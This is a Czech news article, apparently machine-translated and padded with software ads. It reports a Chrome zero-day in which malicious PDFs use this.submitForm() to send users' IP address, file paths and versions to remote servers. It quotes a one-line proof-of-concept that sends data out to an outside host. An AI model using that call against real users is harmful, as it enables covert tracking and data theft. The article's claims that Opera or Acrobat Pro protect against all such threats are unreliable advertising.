- EdgeSpot objevil zajímavou zranitelnost nulového dne využívající dokumenty PDF v prohlížeči Chrome.
- Tento zranitelnost vám může ublížit získáním citlivých dat v počítači.
- Prozkoumejte naše Stránka Web & Cloud pro více informací o dalších nástrojích a službách.
- Máte-li zájem o prohlížeče, poskytujeme o nich spoustu informací v našem Centrum prohlížečů.
Zpřístupněte a zabezpečte všechny své dokumenty pomocí aplikace Adobe Acrobat Reader. Tento nástroj pro správu dokumentů vám také umožní elektronické podepisování a vytváření oficiálních formulářů, které vám ušetří čas v práci. Pořiďte si ho pro svůj počítač a budete moci:
- Otevírejte, tiskněte a upravujte všechny soubory PDF a další typy souborů
- Snadnější vyplňování formulářů PDF
- Udržujte své základní dokumenty šifrované
Získejte všechny aplikace za speciální cenu!
Světový software pro správu dokumentů č. 1 je nyní za skvělou cenu, takže si pospěšte!
Služba detekce zneužití EdgeSpot objevil zajímavý Chrome zranitelnost nulového dne využívající dokumenty PDF.
Zranitelnost umožňuje útočníkům sklízet citlivá data pomocí škodlivých dokumentů PDF otevřených v prohlížeči Chrome.
Jakmile oběť otevře příslušné soubory PDF v prohlížeči Google Chrome, začne na pozadí pracovat škodlivý program, který shromažďuje údaje o uživateli.
Data jsou poté předána na vzdálený server, který je řízen hackery. Možná by vás zajímalo, jaká data útočníci nasávají, ale na váš počítač cílí na následující data:
- IP adresa
- Úplná cesta k souboru PDF v systému
- Verze OS a Chrome
Dejte si pozor na soubory PDF napadené malwarem
Experti puntíkovaný že jedna ze dvou domén readnotify [.] com nebo burpcollaborator [.] net přijímal data.
Odhalili, že útočníci používají this.submitForm () PDF Javascript API pro shromažďování citlivých informací uživatelů.
Testovali jsme to s minimálním PoC, což je jednoduché volání API this.submitForm („ http://google.com/test’) způsobí, že Google Chrome odešle osobní údaje na google.com.
Tato chyba v prohlížeči Chrome byla využívána dvěma odlišnými sadami škodlivých souborů PDF, které obě obíhaly v říjnu 2017 a v září 2018.
Sbíraná data mohou útočníci využít k vyladění útoků v budoucnu. Zprávy naznačují, že první dávka souborů byla kompilována pomocí služby sledování PDF ReadNotify.
Uživatelé mohou službu využívat ke sledování uživatelských zobrazení. EdgeSpot nesdílel žádné podrobnosti týkající se povahy druhé sady souborů PDF.
Rychlý tip: Změňte svůj prohlížeč na Opera
V těchto neklidných dobách jsme na každém kroku napadeni malwarem, phishingem a trojskými koňmi, takže musíme být mnohem ostražitější a zůstat chráněni.
A protože se jedná o problém specifický pro Chrome, můžete se této hrozbě a všem ostatním vyhnout pomocí zabezpečeného prohlížeče Opera.
Tento prohlížeč je dodáván s integrovaným blokovačem reklam, který nejen vymaže takové rozptýlení, ale také blokuje analytické skripty, sledovací pixely a metody sběru vašich dat.
A pokud si chcete být absolutně jisti, že se budete držet dál od jakéhokoli nebezpečí, jděte za vestavěný VPN služba, která je 100% zdarma k použití po neomezenou dobu.
Opera
Opera nabízí perfektní ochranu před hrozbami díky integrovanému blokování reklam a službě VPN zdarma!
Navštivte web
Jak mohu zůstat chráněn před zranitelností PDF?
Stáhněte si Adobe Acrobat PRO
Adobe a Chrome se při práci se soubory PDF dobře hodí. Instalací rozšíření Adobe Extension pro Chrome můžete prohlížet soubory PDF a manipulovat s nimi podle svých představ, aniž byste opustili svůj oblíbený prohlížeč.
Navzdory své robustní struktuře nemusí být malware skrytý v souborech PDF detekován, pokud používáte standardní verzi aplikace Reader.
Profesionální verze se doporučuje, aby byla zaručena vaše ochrana a vaše data byla chráněna před hackery.
I když to není zdarma, cena, kterou zaplatíte, je poměrně malá za nepřeberné množství dalších funkcí, které si užijete, včetně vylepšeného zabezpečení souborů PDF.
K dispozici je také 7denní bezplatná zkušební verze, abyste mohli před nákupem ochutnat celý zážitek z Pro.
Adobe Acrobat PRO
Stáhněte si Adobe Acrobat PRO a vyhýbejte se malwaru. Má spoustu dalších funkcí než bezplatná verze a udržuje vaše data v bezpečí.
Navštivte web
Pokud chcete být při surfování na internetu v bezpečí, budete si muset pořídit plně specializovaný nástroj pro zabezpečení vaší sítě. Nainstalujte si nyní soukromý přístup k internetu a zabezpečte se. Chrání váš počítač před útoky při procházení, maskuje vaši IP adresu a blokuje veškerý nežádoucí přístup.
Služba detekce zneužití EdgeSpot chtěla upozornit uživatele prohlížeče Chrome na potenciální rizika, protože se neočekávalo, že oprava bude vydána v blízké budoucnosti.
EdgeSpot loni informoval Google o zranitelnosti a společnost slíbila vydání opravy koncem dubna.
Můžete však zvážit použití dočasného řešení problému lokálním zobrazením přijatých dokumentů PDF pomocí jiné aplikace pro čtení.
Dokumenty PDF můžete také otevřít v prohlížeči Chrome odpojením systémů od Internetu.
Často kladené otázky
Ano. Ale pokud chcete širší výběr, prozkoumejte naše nejlepší tipy pro ChromeSoukromí rozšíření v tento kompletní průvodce.
Tzde je spousta rozšíření, která umožňují Soubory PDF zpracovává se. Šek z naší vynikající průvodce o nejlepších příponách PDF pro Chrome.
Není, ale můžete jej rychle aktivovat. Tady je naše komplexní průvodce jak povolit generátor QR kódu v prohlížeči Chrome.
